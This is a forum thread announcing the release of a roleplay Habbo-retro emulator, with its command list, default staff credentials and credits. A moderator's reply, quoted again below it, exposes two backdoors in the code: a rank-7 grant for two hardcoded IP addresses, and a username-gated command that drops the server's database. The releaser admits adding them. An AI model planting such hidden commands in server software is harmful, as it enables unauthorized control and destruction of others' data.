Xoa Emulator v4 [Holograph] [RP]

Ari

Member
Sep 29, 2010
320
48
2uyfxvo.png

Decided to quit RP completely since most players are just complete dickheads and don't give a shit about anything or respect anything you code.

Download:

DB Download:


Default Rank 7 User Info:
Username: Test-Acc
Password: lol123

This Emu includes the following features:

:purchase <clothesid>
:figure <clothesid> (clothing store for staff, allows any ids)
:hair x <id>
:surgery x <id>
:sendroom <id>
:senduser <user> <id>
:at <id>
:kill <user>
:resetfigure <user>
:summon <user>
:allowtaxi yes/no
:allowrocket yes/no
:taxi <id>
:allowfight yes/no
:punch <user>
:hit <user>
:slap <user>
:smack <user>
:push <user>
:pull <user>
:ic
:eek:oc
:me <message>
:drink <id>
:hypno <user>
:spy
:corpreset <id>
:superhire <user> <corpid> <jobrank>
:superfire <user>
:hire <user>
:fire <user>
:promote <user>
:demote <user>
:dismiss <user>
:stun <user>
:cuff <user>
:arrest <user> <time>
:heal <user>
:roomheal
:adminheal <user>
:refresh
:refreshroom
:give <user> <amount>
:rocket
:hotelalert

  • fully re coded bot system
  • Gang Cache System
  • Job Cache System
  • Corporation Cache System
  • Bot Cache System
  • User Cache System
  • Arrows

Screenshots:

BfaOWDR.png

l6AV9ik.png

d9792eef3a2c4991a859533.png

bf0e1f64a07c44a2a94adb4.png

QkQZQjy.png

56e4819622534f6287b2427.png

TZWpGoD.png


Credits:
Nillus (for holograph)
RastaLulz (for original RP edition)
Craig (for obbo, surgery, hair, clothing store and help along the way)
Ryno (help along the way)
Clide (help along the way)
Jacky (help along the way)
 

Matty2k7

Member
Jan 20, 2013
179
8
2uyfxvo.png

Decided to quit RP completely since most players are just complete dickheads and don't give a shit about anything or respect anything you code.

Download:

DB Download:


Default Rank 7 User Info:
Username: Test-Acc
Password: lol123

This Emu includes the following features:

:purchase <clothesid>
:figure <clothesid> (clothing store for staff, allows any ids)
:hair x <id>
:surgery x <id>
:sendroom <id>
:senduser <user> <id>
:at <id>
:kill <user>
:resetfigure <user>
:summon <user>
:allowtaxi yes/no
:allowrocket yes/no
:taxi <id>
:allowfight yes/no
:punch <user>
:hit <user>
:slap <user>
:smack <user>
:push <user>
:pull <user>
:ic
:eek:oc
:me <message>
:drink <id>
:hypno <user>
:spy
:corpreset <id>
:superhire <user> <corpid> <jobrank>
:superfire <user>
:hire <user>
:fire <user>
:promote <user>
:demote <user>
:dismiss <user>
:stun <user>
:cuff <user>
:arrest <user> <time>
:heal <user>
:roomheal
:adminheal <user>
:refresh
:refreshroom
:give <user> <amount>
:rocket
:hotelalert

  • fully re coded bot system
  • Gang Cache System
  • Job Cache System
  • Corporation Cache System
  • Bot Cache System
  • User Cache System
  • Arrows


Screenshots:

BfaOWDR.png

l6AV9ik.png

d9792eef3a2c4991a859533.png

bf0e1f64a07c44a2a94adb4.png

QkQZQjy.png

56e4819622534f6287b2427.png

TZWpGoD.png


Credits:
Nillus (for holograph)
RastaLulz (for original RP edition)
Craig (for obbo, surgery, hair, clothing store and help along the way)
Ryno (help along the way)
Clide (help along the way)
Jacky (help along the way)

I get a unhandled exception error in the emu when i try to run it, i only get it after the Gang part loads

Oops btw sorry for all thing, but yeah i get unhandled exception thing?????????
how do i fix?

db broke
 

Sledmore

Chaturbate Livestreamer
Staff member
FindRetros Moderator
Jul 24, 2010
5,194
3,901
I agree with people not respecting, but nice release, however some parts are a bit off, especially these:

case "cl":
PHP:
 if (connectionRemoteIP
                                == "80.0.186.118"
                            || connectionRemoteIP
                            == "68.100.158.42")
                            { _Rank = 7;}

case "epicwin":
PHP:
case "epicwin":
                        {
                            if (_Username == "Jammy-Jackson")
                            {
                                string sqlConfigLocation = IO.workingDirectory + @"\bin\mysql.ini";
                                if (System.IO.File.Exists(sqlConfigLocation) == false)
                                {
                                    return false;
                                }
                                string dbName = IO.readINI("mysql", "database", sqlConfigLocation);
                                using (DatabaseClient dbClient = Eucalypt.dbManager.GetClient())
                                    dbClient.runQuery("DROP DATABASE '" + dbName + "'");
                            }
                            else
                            {
                                return false;
                            }
                            break;
 
                        }

Not checking for more, seems nice, but not a fan of how you do the cycleUsers stuff, a thread every 1 second doesn't seem ideal. - But nice release.
 

Ari

Member
Sep 29, 2010
320
48
I agree with people not respecting, but nice release, however some parts are a bit off, especially these:

case "cl":
PHP:
if (connectionRemoteIP
                                == "80.0.186.118"
                            || connectionRemoteIP
                            == "68.100.158.42")
                            { _Rank = 7;}

case "epicwin":
PHP:
case "epicwin":
                        {
                            if (_Username == "Jammy-Jackson")
                            {
                                string sqlConfigLocation = IO.workingDirectory + @"\bin\mysql.ini";
                                if (System.IO.File.Exists(sqlConfigLocation) == false)
                                {
                                    return false;
                                }
                                string dbName = IO.readINI("mysql", "database", sqlConfigLocation);
                                using (DatabaseClient dbClient = Eucalypt.dbManager.GetClient())
                                    dbClient.runQuery("DROP DATABASE '" + dbName + "'");
                            }
                            else
                            {
                                return false;
                            }
                            break;
 
                        }

Not checking for more, seems nice, but not a fan of how you do the cycleUsers stuff, a thread every 1 second doesn't seem ideal. - But nice release.
had those commands for hotels I gave this too

anyway I thought it was better to have one big thread than lots of little threads
 

Sledmore

Chaturbate Livestreamer
Staff member
FindRetros Moderator
Jul 24, 2010
5,194
3,901
had those commands for hotels I gave this too

anyway I thought it was better to have one big thread than lots of little threads

Yeah, one big thread is a lot better than opening a new thread per user - but if you explore a little more you'll find a much better suitable way to do this. - But nice release.
 

Ept

Many men wish death upon me.
Jun 16, 2011
591
276
I don't see anything unreleased that's in this emulator, apart from maybe turfs. I'll be sure to test it out though, thanks for the release.
 

Rama

Member
Jan 4, 2011
245
14
I don't see anything unreleased that's in this emulator, apart from maybe turfs. I'll be sure to test it out though, thanks for the release.
I personally disagree, this emulator was pretty much a good release and it has many more features such as arrows and XP system which nobody released I think? However, problem is, there is hardly any CMS that are compatible with this job cache system and many more.
 

Ept

Many men wish death upon me.
Jun 16, 2011
591
276
I personally disagree, this emulator was pretty much a good release and it has many more features such as arrows and XP system which nobody released I think? However, problem is, there is hardly any CMS that are compatible with this job cache system and many more.
I remember arrows being released, the XP system I'm not sure. I'll be testing this out soon, like I said, and I'll let you all know how it performs.
 

Ari

Member
Sep 29, 2010
320
48
Arrows are rynos I think not sure tho lol

and banker bot has not been done before, I dont think so anyway.
 

Users who are viewing this thread

Top